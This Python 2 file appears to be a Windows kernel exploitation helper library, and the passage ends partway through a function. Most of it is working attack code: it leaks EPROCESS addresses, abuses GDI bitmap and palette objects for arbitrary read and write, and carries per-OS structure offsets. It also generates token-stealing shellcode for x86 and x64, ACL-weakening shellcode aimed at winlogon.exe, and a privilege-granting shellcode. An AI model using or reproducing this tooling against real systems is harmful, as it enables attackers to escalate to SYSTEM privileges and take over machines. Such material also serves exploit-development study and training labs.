def leak_eprocess_address_palette(manager_palette, worker_palette):
	"""
	This function can be used to leak the current process EPROCESS structure address from low integrity mode, as described here:
	https://improsec.com/blog/windows-kernel-shellcode-on-windows-10-part-4-there-is-no-code
	@param manager_palette: handle to the manager palette
	@param worker_palette: handle to the worker palette
	@return: address of the EPROCESS
	"""
	print "[*] Leaking EPROCESS using tagWND and PALETTE objects"
	pHMValidateHandle = findHMValidateHandle()
	HMValidateHandleProto = WINFUNCTYPE (c_ulonglong, HWND, c_int)
	HMValidateHandle = HMValidateHandleProto(pHMValidateHandle)

	WndProc = WNDPROCTYPE(PyWndProcedure)
	hInst = kernel32.GetModuleHandleA(0)

	# instantiate WNDCLASSEX 
	wndClass = WNDCLASSEX()
	wndClass.cbSize = sizeof(WNDCLASSEX)
	wndClass.lpfnWndProc = WndProc
	wndClass.cbWndExtra = 0
	wndClass.hInstance = hInst
	wndClass.lpszMenuName = 'A' * 0x8f0 
	wndClass.lpszClassName = "Class_Leaker"

	# Register Class and Create Window
	hCls = user32.RegisterClassExW(byref(wndClass))
	hWnd = user32.CreateWindowExA(0,"Class_Leaker",'Franco',0xcf0000,0,0,300,300,0,0,hInst,0)
	pWnd = HMValidateHandle(hWnd,1)
	kernelpSelf = (cast(pWnd+0x20, POINTER(c_ulonglong))).contents.value #tagWND in kernel

	pThreadInfo = c_ulonglong()
	read_memory_palette(manager_palette, worker_palette, kernelpSelf + 0x10, byref(pThreadInfo), sizeof(pThreadInfo)); #tagWND + 0x10 is a pointer to THREADINFO structure
	
	pEthread = c_ulonglong()
	read_memory_palette(manager_palette, worker_palette, pThreadInfo.value, byref(pEthread), sizeof(pEthread)); #offset 0x0 in THREADINFO pointer to ETHREAD

	(KTHREAD_Process, EPROCESS_ActiveProcessLinks, EPROCESS_UniqueProcessId, EPROCESS_Token, EPROCESS_ImageFileName, TOKEN_IntegrityLevelIndex) = getosvariablesx64()
	
	eprocess =  c_ulonglong()
	read_memory_palette(manager_palette, worker_palette, pEthread.value + KTHREAD_Process, byref(eprocess), sizeof(eprocess)); #offset to pointer to EPROCESS
	print "[+] EPROCESS address leaked: %s" % hex(eprocess.value)
	return eprocess.value


#source: https://github.com/GradiusX/HEVD-Python-Solutions/blob/master/Win10%20x64%20v1703/HEVD_arbitraryoverwrite.py
def alloc_free_windows(classNumber):
	""" Calls alloc_free_window() until current address matches previous one """
	pHMValidateHandle = findHMValidateHandle()
	previous_entry = 0
	while (1):
		plpszMenuName = allocate_free_window(classNumber, pHMValidateHandle)
		if previous_entry == plpszMenuName:
			return plpszMenuName
		previous_entry = plpszMenuName
		classNumber = classNumber + 1 

def gdi_abuse_gdisharedhandletable_technique():
	"""
	Technique to be used on Win 10 v1511 or earlier. Locate the pvscan0 address with the help of gdiSharedHandleTable
	@return: pvscan0 address of the manager and worker bitmap and the handles
	"""
	(manager_bitmap_handle, worker_bitmap_handle) = create_bitmaps(0x64, 0x64, 32)
	worker_bitmap_pvscan0 = get_pvscan0_address(worker_bitmap_handle)
	manager_bitmap_pvscan0 = get_pvscan0_address(manager_bitmap_handle)
	return (manager_bitmap_pvscan0, worker_bitmap_pvscan0, manager_bitmap_handle, worker_bitmap_handle)

def gdi_abuse_accelerator_tables_technique():
	"""
	Technique to be used on Win 10 v1607 or earlier. Locate the pvscan0 address with the help of ACCEL user object
	@return: pvscan0 address of the manager and worker bitmap and the handles
	"""
	accelerator_address = alloc_free_accelerator_tables()
	manager_bitmap_handle = create_bitmap(0x100, 0x6D, 1)
	manager_bitmap_pvscan0 = accelerator_address + 0x50
	accelerator_address = alloc_free_accelerator_tables()
	worker_bitmap_handle = create_bitmap(0x100, 0x6D, 1)
	worker_bitmap_pvscan0 = accelerator_address + 0x50
	return (manager_bitmap_pvscan0, worker_bitmap_pvscan0, manager_bitmap_handle, worker_bitmap_handle)

def gdi_abuse_tagwnd_technique_bitmap():
	"""
	Technique to be used on Win 10 v1703 or earlier. Locate the pvscan0 address with the help of tagWND structures
	@return: pvscan0 address of the manager and worker bitmap and the handles
	"""
	window_address = alloc_free_windows(0)
	manager_bitmap_handle = create_bitmap(0x100, 0x6D, 1)
	manager_bitmap_pvscan0 = window_address + 0x50
	window_address = alloc_free_windows(0)
	worker_bitmap_handle = create_bitmap(0x100, 0x6D, 1)
	worker_bitmap_pvscan0 = window_address + 0x50
	return (manager_bitmap_pvscan0, worker_bitmap_pvscan0, manager_bitmap_handle, worker_bitmap_handle)

def gdi_abuse_tagwnd_technique_palette():
	"""
	Technique to be used on Win 10 v1709 or earlier. Locate the pFirstColor address with the help of tagWND structures
	@return: pFirstColor address of the manager and worker palettes and the handles
	"""
	p = platform.platform()
	a = platform.architecture()[0]
	if a == '32bit' and p == 'Windows-7-6.1.7601-SP1':
		pFirstColor_offset = 0x4c
	elif p == 'Windows-10-10.0.14393' or p == 'Windows-10-10.0.15063' or p == 'Windows-10-10.0.16299':
		pFirstColor_offset = 0x78
	elif p == 'Windows-10-10.0.10586' or p == 'Windows-8-6.2.9200-SP0' or p == 'Windows-8.1-6.3.9600' or p == 'Windows-7-6.1.7601-SP1':
		pFirstColor_offset = 0x80
	else:
		print "[-] This platform is not supported for palettes"
		sys.exit(-1)

	manager_palette_address = alloc_free_windows(0)
	print "[*] Manager palette kernel address: %s" % hex(manager_palette_address)
	manager_palette_handle = create_palette_with_size(0x1000)
	manager_palette_pFirstColor = manager_palette_address + pFirstColor_offset
	worker_palette_address = alloc_free_windows(0)
	print "[*] Worker palette kernel kaddress: %s" % hex(worker_palette_address)
	worker_palette_handle = create_palette_with_size(0x1000)
	worker_palette_pFirstColor = worker_palette_address + pFirstColor_offset
	if manager_palette_address == worker_palette_address:
		print "[-] An error occured during palette allocation, try to rerun the exploit"
		sys.exit(-1)
	return (manager_palette_pFirstColor, worker_palette_pFirstColor, manager_palette_handle, worker_palette_handle)
	
def get_www_address_and_bitmaps():
	"""
	Get a What and Where addresses to be used with GDI abuse and the related handles, it should work independent the underlying OS
	@return: what, where addresses for WWW vulns and manager & worker bitmap handles
	"""
	p = platform.platform()
	if p == 'Windows-10-10.0.10586' or p == 'Windows-8-6.2.9200-SP0' or p == 'Windows-8.1-6.3.9600' or p == 'Windows-7-6.1.7601-SP1':
		(manager_bitmap_pvscan0, worker_bitmap_pvscan0, manager_bitmap_handle, worker_bitmap_handle) = gdi_abuse_gdisharedhandletable_technique()
	elif p == 'Windows-10-10.0.14393':
		(manager_bitmap_pvscan0, worker_bitmap_pvscan0, manager_bitmap_handle, worker_bitmap_handle) = gdi_abuse_accelerator_tables_technique()
	elif p == 'Windows-10-10.0.15063':
		(manager_bitmap_pvscan0, worker_bitmap_pvscan0, manager_bitmap_handle, worker_bitmap_handle) = gdi_abuse_tagwnd_technique_bitmap()
	else:
		print "[-] No matching OS found to abuse GDI objects, exiting..."
		sys.exit(-1)
	print "[+] Manager Bitmap pvscan0 offset: %s" % hex(manager_bitmap_pvscan0)
	print "[+] Worker Bitmap pvscan0 address: %s" % hex(worker_bitmap_pvscan0)
	what = c_void_p(worker_bitmap_pvscan0)
	where = manager_bitmap_pvscan0
	return (what, where, manager_bitmap_handle, worker_bitmap_handle)

def get_www_address_and_palettes():
	"""
	Get a What and Where addresses to be used with GDI abuse and the related handles, it should work independent the underlying OS
	@return: what, where addresses for WWW vulns and manager & worker palettes handles
	"""
	(manager_palette_pFirstColor, worker_palette_pFirstColor, manager_palette_handle, worker_palette_handle) = gdi_abuse_tagwnd_technique_palette()
	what = c_void_p(worker_palette_pFirstColor)
	where = manager_palette_pFirstColor
	return (what, where, manager_palette_handle, worker_palette_handle)


#########################################################################################
###################This section contains other general functions#########################
#########################################################################################

def ctl_code(function,
			 devicetype = FILE_DEVICE_UNKNOWN,
			 access = FILE_ANY_ACCESS,
			 method = METHOD_NEITHER):
	"""Recreate CTL_CODE macro to generate driver IOCTL"""
	return ((devicetype << 16) | (access << 14) | (function << 2) | method)


#https://www.exploit-db.com/exploits/34272/
def getLastError():
	"""Format GetLastError"""
	buf = create_string_buffer(2048)
	if kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL,
			kernel32.GetLastError(), NULL,
			buf, sizeof(buf), NULL):
		print "[-] " +  buf.value
	else:
		print "[-] Unknown Error"

#https://www.exploit-db.com/exploits/34272/
def alloc_memory(base_address, input, input_size):
	"""
	Allocate input buffer
	"""
	print "[*] Allocating input buffer"
	if platform.architecture()[0] == '64bit':
		if base_address == None: base_address_c = c_ulonglong(0)
		else: base_address_c   = c_ulonglong(base_address)		
		ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_ulonglong), c_ulong, POINTER(c_int), c_int, c_int]
	else:
		if base_address == None: base_address_c = c_ulonglong(0)
		else: base_address_c = c_int(base_address)
		ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong, POINTER(c_int), c_int, c_int]
	input_size_c = c_int(input_size)
	dwStatus = ntdll.NtAllocateVirtualMemory(-1,
											 byref(base_address_c),
											 0x0, 
											 byref(input_size_c), 
											 MEM_RESERVE|MEM_COMMIT,
											 PAGE_EXECUTE_READWRITE)
	if dwStatus != STATUS_SUCCESS:
		print "[-] Error while allocating memory: %s" % hex(signed_to_unsigned(dwStatus))
		getLastError()
		sys.exit()
	written = c_ulong()
	alloc = kernel32.WriteProcessMemory(-1, base_address_c, input, len(input), byref(written))
	if alloc == 0:
		print "[-] Error while writing our input buffer memory: %s" % alloc
		getLastError()
		sys.exit()
	return base_address_c

def alloc_memory_virtualalloc(base_address, input, input_size):
	print "[*] Allocating input buffer"	
	address = kernel32.VirtualAlloc(base_address, input_size, (MEM_COMMIT | MEM_RESERVE), PAGE_EXECUTE_READWRITE)
	if not address:
		print "[-] Error allocating memory: " + getLastError()
		sys.exit(-1)

	print "[+] Input buffer allocated at: 0x%x" % address

	memmove(address, input, len(input))
	return address


#https://github.com/zeroSteiner/mayhem/blob/master/mayhem/exploit/windows.py
def find_driver_base(driver=None):
	if platform.architecture()[0] == '64bit':
		lpImageBase = (c_ulonglong * 1024)()
		lpcbNeeded = c_longlong()
		Psapi.GetDeviceDriverBaseNameA.argtypes = [c_longlong, POINTER(c_char), c_uint32]
	else:
		lpImageBase = (c_ulong * 1024)()
		lpcbNeeded = c_long()
	driver_name_size = c_long()
	driver_name_size.value = 48
	Psapi.EnumDeviceDrivers(byref(lpImageBase), c_int(1024), byref(lpcbNeeded))
	for base_addr in lpImageBase:
		driver_name = c_char_p('\x00' * driver_name_size.value)
		if base_addr:
			Psapi.GetDeviceDriverBaseNameA(base_addr, driver_name, driver_name_size.value)
			if driver == None and driver_name.value.lower().find("krnl") != -1:
				print "[+] Retrieving kernel info..."
				print "[+] Kernel version:", driver_name.value
				print "[+] Kernel base address: %s" % hex(base_addr)
				return (base_addr, driver_name.value)
			elif driver_name.value.lower() == driver:
				print "[+] Retrieving %s info..." % driver_name
				print "[+] %s base address: %s" % (driver_name, hex(base_addr))
				return (base_addr, driver_name.value)
	return None	
 
#https://github.com/zeroSteiner/mayhem/blob/master/mayhem/exploit/windows.py
def get_haldispatchtable():
 	if platform.architecture()[0] == '64bit':
		kernel32.LoadLibraryExA.restype = c_uint64
		kernel32.GetProcAddress.argtypes = [c_uint64, POINTER(c_char)]
		kernel32.GetProcAddress.restype = c_uint64
	(krnlbase, kernelver) = find_driver_base()
	hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1)
	HalDispatchTable = kernel32.GetProcAddress(hKernel, 'HalDispatchTable')
	HalDispatchTable -= hKernel
	HalDispatchTable += krnlbase
	print "[+] HalDispatchTable address:", hex(HalDispatchTable)
	return HalDispatchTable

def get_psinitialsystemprocess():	
 	if platform.architecture()[0] == '64bit':
		kernel32.LoadLibraryExA.restype = c_uint64
		kernel32.GetProcAddress.argtypes = [c_uint64, POINTER(c_char)]
		kernel32.GetProcAddress.restype = c_uint64
	(krnlbase, kernelver) = find_driver_base()
	print "[+] Loading %s in userland" % kernelver
	hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1)
	print "[+] %s base address : %s" % (kernelver, hex(hKernel))
	PsInitialSystemProcess = kernel32.GetProcAddress(hKernel, 'PsInitialSystemProcess')
	PsInitialSystemProcess -= hKernel
	PsInitialSystemProcess += krnlbase
	print "[+] PsInitialSystemProcess address: %s" % hex(PsInitialSystemProcess)
	return PsInitialSystemProcess

	
def get_haldisp_offsets():
	(halbase, dllname) = find_driver_base("hal.dll")
	version = sys.getwindowsversion()
	p = platfrom.platform()
	a = platform.architecture()[0]
	if a == '32bit':
		if((version.major == 5) and (version.minor == 1) and ('3' in version.service_pack)):
			# the target machine's OS is Windows XP SP3
			HaliQuerySystemInformation = halbase+0x16bba # Offset for XPSP3
			HalpSetSystemInformation   = halbase+0x19436 # Offset for XPSP3
		elif((version.major == 5) and (version.minor == 2) and ('2' in version.service_pack)):
			# the target machine's OS is Windows Server 2003 SP2
			HaliQuerySystemInformation = halbase+0x1fa1e # Offset for WIN2K3
			HalpSetSystemInformation   = halbase+0x21c60 # Offset for WIN2K3
		elif((version.major == 6) and (version.minor == 1) and ('1' in version.service_pack)):
			# the target machine's OS is Windows 7x86 SP1
			HaliQuerySystemInformation = halbase+0x278a2 # Offset for WIN7SP1x86
			HalpSetSystemInformation   = halbase+0x281b4 # Offset for WIN7SP1x86
		else:
			print "[-] No info about HaliQuerySystemInformation and HalpSetSystemInformation for this OS version"
			print "[-] Exiting..."
			sys.exit(-1)
	else:
		if((version.major == 6) and (version.minor == 1) and ('1' in version.service_pack)):
			# the target machine's OS is Windows 7x64 SP1
			HaliQuerySystemInformation = halbase+0x398e8 # Offset for win7 x64
			HalpSetSystemInformation = 0
		else:
			print "[-] No info about HaliQuerySystemInformation and HalpSetSystemInformation for this OS version"
			print "[-] Exiting..."
			sys.exit(-1)

	print "[+] HaliQuerySystemInformation address: %s" % hex(HaliQuerySystemInformation)
	print "[+] HalpSetSystemInformation address: %s" % hex(HalpSetSystemInformation)
	return (HaliQuerySystemInformation,HalpSetSystemInformation)

def getosvariablesx86():
	"""
	Get various structure variables based on OS version
	@return: tuple of (KTHREAD_Process, EPROCESS_ActiveProcessLinks, EPROCESS_UniqueProcessId, EPROCESS_Token, EPROCESS_ImageFileName, TOKEN_IntegrityLevelIndex)
	"""
	KTHREAD_Process = 0
	EPROCESS_ActiveProcessLinks = 0
	EPROCESS_UniqueProcessId = 0
	EPROCESS_Token = 0
	EPROCESS_ImageFileName = 0
	TOKEN_IntegrityLevelIndex = 0
	version = sys.getwindowsversion()
	p = platform.platform()

	if((version.major == 5) and (version.minor == 1) and ('3' in version.service_pack)):
		# the target machine's OS is Windows XP SP3
		print "[*] OS version: Windows XP SP3"
		KTHREAD_Process = 0x44
		EPROCESS_Token	= 0xc8
		EPROCESS_UniqueProcessId	 = 0x84
		EPROCESS_ActiveProcessLinks  = 0x88
 
	elif((version.major == 5) and (version.minor == 2) and ('2' in version.service_pack)):
		# the target machine's OS is Windows Server 2003 SP2
		print "[*] OS version: Windows Server 2003 SP2"
		KTHREAD_Process = 0x38
		EPROCESS_Token	= 0xD8
		EPROCESS_UniqueProcessId	 = 0x94
		EPROCESS_ActiveProcessLinks  = 0x98
 
	elif((version.major == 6) and (version.minor == 0) and ('1' in version.service_pack or '2' in version.service_pack) and (version.product_type == VER_NT_WORKSTATION)):
		# the target machine's OS is Windows Vista SP1 / SP2
		print "[*] OS version: Windows Vista SP1 / SP2"
		KTHREAD_Process = 0x48
		EPROCESS_Token	= 0xE0
		EPROCESS_UniqueProcessId	 = 0x9C
		EPROCESS_ActiveProcessLinks  = 0xA0
 
	elif((version.major == 6) and (version.minor == 0) and ('1' in version.service_pack or '2' in version.service_pack) and (version.product_type != VER_NT_WORKSTATION)):
		# the target machine's OS is Windows Server 2008 / SP2
		print "[*] OS version: Windows Server 2008 / SP2"
		KTHREAD_Process = 0x48
		EPROCESS_Token	= 0xE0
		EPROCESS_UniqueProcessId	 = 0x9C
		EPROCESS_ActiveProcessLinks  = 0xA0
 
	elif p == 'Windows-7-6.1.7601-SP1':
		# the target machine's OS is Windows 7 / SP1
		print "[*] OS version: Windows 7 / SP1"
		KTHREAD_Process = 0x50
		EPROCESS_Token	= 0xF8
		EPROCESS_UniqueProcessId	 = 0xB4
		EPROCESS_ActiveProcessLinks  = 0xB8

	else:
		print "[-] No matching OS version, exiting..."
		sys.exit(-1)
	
	return (KTHREAD_Process, EPROCESS_ActiveProcessLinks, EPROCESS_UniqueProcessId, EPROCESS_Token, EPROCESS_ImageFileName, TOKEN_IntegrityLevelIndex)

def getosvariablesx64():
	"""
	Gets various structure variables based on OS version
	# kd> dt nt!_EPROCESS uniqueprocessid token activeprocesslinks
	# kd> dt nt!_KTHREAD ApcState; dt _KAPC_STATE process
	@return: tuple of (KTHREAD_Process, EPROCESS_ActiveProcessLinks, EPROCESS_UniqueProcessId, EPROCESS_Token, EPROCESS_ImageFileName, TOKEN_IntegrityLevelIndex)
	"""
	KTHREAD_Process = 0
	EPROCESS_ActiveProcessLinks = 0
	EPROCESS_UniqueProcessId = 0
	EPROCESS_Token = 0
	EPROCESS_ImageFileName = 0
	TOKEN_IntegrityLevelIndex = 0
	version = sys.getwindowsversion()
	p = platform.platform()
	if((version.major == 5) and (version.minor == 2)):
		# the target machine's OS is Windows Server 2003
		print "[*] OS version: Windows Server 2003"
		KTHREAD_Process = 0x68
		EPROCESS_Token	= 0x160
		EPROCESS_UniqueProcessId = 0xd8
		EPROCESS_ActiveProcessLinks  = 0xe0
	elif p == 'Windows-7-6.1.7601-SP1':
		print "[*] OS version: Windows 7x64 SP1"
		KTHREAD_Process = 0x70
		EPROCESS_UniqueProcessId	 = 0x180
		EPROCESS_ActiveProcessLinks  = 0x188
		EPROCESS_Token	= 0x208
		EPROCESS_ImageFileName = 0x2e0
		TOKEN_IntegrityLevelIndex = 0xc8
	elif p == 'Windows-8-6.2.9200-SP0':
		print "[*] OS version: Windows 8x64"
		KTHREAD_Process = 0xb8
		EPROCESS_UniqueProcessId	 = 0x2e0
		EPROCESS_ActiveProcessLinks  = 0x2e8
		EPROCESS_Token	= 0x348
		EPROCESS_ImageFileName = 0x438
		TOKEN_IntegrityLevelIndex = 0xd0
	elif p == 'Windows-8.1-6.3.9600':
		print "[*] OS version: Windows 8.1x64"
		KTHREAD_Process = 0xb8
		EPROCESS_UniqueProcessId	 = 0x2e0
		EPROCESS_ActiveProcessLinks  = 0x2e8
		EPROCESS_Token	= 0x348
		EPROCESS_ImageFileName = 0x438
		TOKEN_IntegrityLevelIndex = 0xd0
	elif p == 'Windows-10-10.0.10586':
		print "[*] OS version: Windows 10x64 v1511 November Update"
		KTHREAD_Process = 0xb8
		EPROCESS_UniqueProcessId = 0x2e8
		EPROCESS_ActiveProcessLinks = 0x2f0
		EPROCESS_Token = 0x358
		EPROCESS_ImageFileName = 0x450
		TOKEN_IntegrityLevelIndex = 0xd0
	elif p == 'Windows-10-10.0.14393':
		print "[*] OS version: Windows 10x64 v1607 Anniversary Update"
		KTHREAD_Process = 0xb8
		EPROCESS_UniqueProcessId = 0x2e8
		EPROCESS_ActiveProcessLinks = 0x2f0
		EPROCESS_Token = 0x358
		EPROCESS_ImageFileName = 0x450
		TOKEN_IntegrityLevelIndex = 0xd0
	elif p == 'Windows-10-10.0.15063':
		print "[*] OS version: Windows 10x64 v1703 Creators Update"
		KTHREAD_Process = 0xb8
		EPROCESS_UniqueProcessId = 0x2e0
		EPROCESS_ActiveProcessLinks = 0x2e8
		EPROCESS_Token = 0x358
		EPROCESS_ImageFileName = 0x450
		TOKEN_IntegrityLevelIndex = 0xd0
	elif p == 'Windows-10-10.0.16299':
		print "[*] OS version: Windows 10x64 v1709 Creators Update"
		KTHREAD_Process = 0xb8
		EPROCESS_UniqueProcessId = 0x2e0
		EPROCESS_ActiveProcessLinks = 0x2e8
		EPROCESS_Token = 0x358
		EPROCESS_ImageFileName = 0x450
		TOKEN_IntegrityLevelIndex = 0xd0
	else:
		print "[-] No matching OS version, exiting..."
		sys.exit(-1)
		
	return (KTHREAD_Process, EPROCESS_ActiveProcessLinks, EPROCESS_UniqueProcessId, EPROCESS_Token, EPROCESS_ImageFileName, TOKEN_IntegrityLevelIndex)

def restore_hal_ptrs(HalDispatchTable,HaliQuerySystemInformation,HalpSetSystemInformation):
	"""
	Return a shellcode to retore HalDispatchTable ptrs
	"""
	if HaliQuerySystemInformation == 0x0 or HalpSetSystemInformation == 0x0:
		return ""
	else:
		shellcode = (
		"\x31\xc0"
		"\xb8" + struct.pack("L", HalpSetSystemInformation) +
		"\xa3" + struct.pack("L", HalDispatchTable + 0x8) +
		"\xb8" + struct.pack("L", HaliQuerySystemInformation) +
		"\xa3" + struct.pack("L", HalDispatchTable + 0x4)
		)
	
		return shellcode

def restoretokenx86(RETVAL, extra = ""):
	"""
	Create a token restore shellcode
	@param RETVAL: the value for the ASM RET instruction
	@return: token restore shellcode related to the platform
	"""
	(KTHREAD_Process, EPROCESS_ActiveProcessLinks, EPROCESS_UniqueProcessId, EPROCESS_Token, EPROCESS_ImageFileName, TOKEN_IntegrityLevelIndex) = getosvariablesx86()
	shellcode =  (
	"\x52"
	"\x33\xc0"														# xor	eax,eax
	"\x64\x8b\x80\x24\x01\x00\x00"									# mov	eax,DWORD PTR fs:[eax+0x124]
	"\x8b\x40" + struct.pack("B",KTHREAD_Process)  +				# mov	eax,DWORD PTR [eax+_KTHREAD_Process]
	"\x8b\x15\x00\x09\x02\x00"
	"\x89\x90" + struct.pack("B",EPROCESS_Token) + "\x00\x00\x00"	# mov	edx,DWORD PTR [eax+0xf8]
	"\x5a"
	)
	
	if RETVAL == "":
		shellcode += "\xc3"						#retn
	else:
		shellcode += "\xc2" + RETVAL + "\x00"	# ret	0x8	
	
	shellcode = shellcode + '\x90' * (len(shellcode) % 4)
	return shellcode

#https://www.exploit-db.com/exploits/18176/ 
def tokenstealingx86(RETVAL, extra = ""):
	"""
	Create a token stealing shellcode for x86 platform
	@param RETVAL: the value for the ASM RET instruction
	@param extra: extra shellcode to put after tokenstealing (e.g.: restore stack)
	@return: token stealing shellcode related to the platform
	"""
	(KTHREAD_Process, EPROCESS_ActiveProcessLinks, EPROCESS_UniqueProcessId, EPROCESS_Token, EPROCESS_ImageFileName, TOKEN_IntegrityLevelIndex) = getosvariablesx86()
	shellcode = (
	"\x60"																			# pushad
	"\x33\xc0"																		# xor	eax,eax
	"\x64\x8b\x80\x24\x01\x00\x00"													# mov	eax,DWORD PTR fs:[eax+0x124]
	"\x8b\x40" + struct.pack("B",KTHREAD_Process) +									# mov	eax,DWORD PTR [eax+_KTHREAD_Process]
	"\x8b\xc8"																		# mov	ecx,eax
	"\x8b\x80" + struct.pack("B",EPROCESS_ActiveProcessLinks) + "\x00\x00\x00"		# mov	eax,DWORD PTR [eax+0xb8]
	"\x2d" + struct.pack("B",EPROCESS_ActiveProcessLinks) + "\x00\x00\x00"			# sub	eax,0xb8
	"\x83\xb8" + struct.pack("B",EPROCESS_UniqueProcessId) + "\x00\x00\x00\x04"		# cmp	DWORD PTR [eax+0xb4],0x4
	"\x75\xec"																		# jne	0xe
	"\x8b\x90" + struct.pack("B",EPROCESS_Token) + "\x00\x00\x00"					# mov	edx,DWORD PTR [eax+0xf8]
	"\x89\x91" + struct.pack("B",EPROCESS_Token) + "\x00\x00\x00"					# mov	DWORD PTR [ecx+0xf8],edx
	"\x61"																			# popad
	)
	
	shellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack
	
	if RETVAL == "":
		shellcode += "\xc3"						#retn
	else:
		shellcode += "\xc2" + RETVAL + "\x00"	# ret	0x8	
	
	shellcode = shellcode + '\x90' * (len(shellcode) % 4)
	return shellcode
	
def tokenstealingx64(RETVAL, extra = ""):
	"""
	Create a token stealing shellcode for x64 platform
	@param RETVAL: the value for the ASM RET instruction
	@param extra: extra shellcode to put after tokenstealing (e.g.: restore stack)
	@return: token stealing shellcode related to the platform
	"""
	(KTHREAD_Process, EPROCESS_ActiveProcessLinks, EPROCESS_UniqueProcessId, EPROCESS_Token, EPROCESS_ImageFileName, TOKEN_IntegrityLevelIndex) = getosvariablesx64()
	shellcode = (
	"\x65\x48\x8b\x04\x25\x88\x01\x00\x00"												# mov	 rax, [gs:0x188]		 ;Get current ETHREAD in
	)
	
	if KTHREAD_Process > 0x7f:
		shellcode = shellcode + "\x48\x8b\x80" + struct.pack("B",KTHREAD_Process) + "\x00\x00\x00" # mov	 rax, [rax+0x68]		 ;Get current KTHREAD_Process address
	else:
		shellcode = shellcode + "\x48\x8b\x40" + struct.pack("B",KTHREAD_Process)
	
	shellcode = shellcode + ("\x48\x89\xc1"												# mov	 rcx, rax				;Copy current KTHREAD_Process address to RCX
	"\x48\x8b\x80" + struct.pack("H",EPROCESS_ActiveProcessLinks) + "\x00\x00"			# mov	 rax, [rax+0xe0]		 ;Next KTHREAD_Process ActivKTHREAD_ProcessLinks.Flink
	"\x48\x2d" + struct.pack("H",EPROCESS_ActiveProcessLinks) + "\x00\x00"				# sub	 rax, 0xe0			   ;Go to the beginning of the KTHREAD_Process structure
	"\x4c\x8b\x88" + struct.pack("H",EPROCESS_UniqueProcessId) + "\x00\x00"				# mov	 r9 , [rax+0xd8]		 ;Copy PID to R9
	"\x49\x83\xf9\x04"																	# cmp	 r9 , 0x4				;Compare R9 to SYSTEM PID (=4)
	"\x75\xe6"																			# jnz short find_system_process   ;If not SYSTEM got to next KTHREAD_Process
	"\x48\x8b\x90" + struct.pack("H",EPROCESS_Token) + "\x00\x00"						# mov	 rdx, [rax+0x160]		;Copy SYSTEM process token address to RDX
	"\x48\x89\x91" + struct.pack("H",EPROCESS_Token) + "\x00\x00"						# mov	 [rcx+0x160], rdx		;Steal token with overwriting our current process's token address
	)
	
	shellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack

	if RETVAL == "":
		shellcode += "\xc3"						#retn
	else:
		shellcode += "\xc2" + RETVAL + "\x00"	# ret	0x8	
	shellcode = shellcode + '\x90' * (len(shellcode) % 4)	
	return shellcode

def acl_shellcode_x64(RETVAL, extra = "", name = "winlogon.exe"):
	"""
	Create a shellcode for x64 platform to set the ACL for the given process name so that it will allow access for authenticated users
	based on: https://improsec.com/blog/windows-kernel-shellcode-on-windows-10-part-2
	@param RETVAL: the value for the ASM RET instruction
	@param extra: extra shellcode to put after tokenstealing (e.g.: restore stack)
	@param name: name of the process where to set the ACL
	@return: token stealing shellcode related to the platform
	"""
	(KTHREAD_Process, EPROCESS_ActiveProcessLinks, EPROCESS_UniqueProcessId, EPROCESS_Token, EPROCESS_ImageFileName, TOKEN_IntegrityLevelIndex) = getosvariablesx64()
	shellcode = (
	"\x65\x48\x8b\x04\x25\x88\x01\x00\x00"												# mov	 rax, [gs:0x188]	;Get current ETHREAD in
	)
	
	if KTHREAD_Process > 0x7f:
		shellcode = shellcode + "\x48\x8b\x80" + struct.pack("B",KTHREAD_Process) + "\x00\x00\x00" # mov	 rax, [rax+0x68]		 ;Get current KTHREAD_Process address
	else:
		shellcode = shellcode + "\x48\x8b\x40" + struct.pack("B",KTHREAD_Process)
	
	shellcode = shellcode + ("\x48\x89\xc1"												# mov	 rcx, rax			;Copy current KTHREAD_Process address to RCX
	"\x48\x8b\x80" + struct.pack("H",EPROCESS_ActiveProcessLinks) + "\x00\x00"			# mov	 rax, [rax+0xe0]		 ;Next KTHREAD_Process ActivKTHREAD_ProcessLinks.Flink
	"\x48\x2d" + struct.pack("H",EPROCESS_ActiveProcessLinks) + "\x00\x00"				# sub	 rax, 0xe0			   ;Go to the beginning of the KTHREAD_Process structure
	"\x81\xB8" + struct.pack("H",EPROCESS_ImageFileName) + "\x00\x00" + name[0:4] + # cmp dword ptr [rax+0x450], 0x6c6e6977
	"\x75\xe7"																			# jnz short find_process   ;If no match got to next KTHREAD_Process
	"\x48\x83\xE8\x08"																	# sub rax, 0x8 ; get to the SecurityDescriptor in the _OBJECT_HEADER
	"\x48\x8B\x00" 																		# mov rax, qword ptr [rax]
	"\x48\x83\xE0\xF0"																	# and rax, 0x0FFFFFFFFFFFFFFF0 ; clear last 4 bits
	"\x48\x83\xC0\x48"																	# add rax, 0x48
	"\xC6\x00\x0B"																		# mov byte ptr [rax], 0x0b
	"\x48\x81\xC1" + struct.pack("H",EPROCESS_Token) + "\x00\x00"						# add rcx, 0x358  ; offset the Tokens
	"\x48\x8B\x01"																		# mov rax, qword ptr [rcx] ; copy pointer
	"\x48\x83\xE0\xF0"																	# and rax, 0x0FFFFFFFFFFFFFFF0 ; clear last 4 bits
	"\x48\x05" + struct.pack("B",TOKEN_IntegrityLevelIndex + 4) + "\x00\x00\x00" 		# add rax, 0xd0+4 (0xd4)
	"\xC6\x00\x00"																		# mov byte ptr [rax], 0
	)
	
	shellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack
	if RETVAL == "":
		shellcode += "\xc3"						#retn
	else:
		shellcode += "\xc2" + RETVAL + "\x00"	# ret	0x8	
	
	shellcode = shellcode + '\x90' * (len(shellcode) % 4)
	return shellcode

def privilege_shellcode_x64(RETVAL, extra = ""):
	"""
	Create a shellcode for x64 platform to give full privileges for the current process
	based on: https://improsec.com/blog/windows-kernel-shellcode-on-windows-10-part-3
	@param RETVAL: the value for the ASM RET instruction
	@param extra: extra shellcode to put after tokenstealing (e.g.: restore stack)
	@return: token stealing shellcode related to the platform
	"""
	(KTHREAD_Process, EPROCESS_ActiveProcessLinks, EPROCESS_UniqueProcessId, EPROCESS_Token, EPROCESS_ImageFileName, TOKEN_IntegrityLevelIndex) = getosvariablesx64()
	shellcode = (
	"\x65\x48\x8b\x04\x25\x88\x01\x00\x00"												# mov	 rax, [gs:0x188]	;Get current ETHREAD in
	)
	
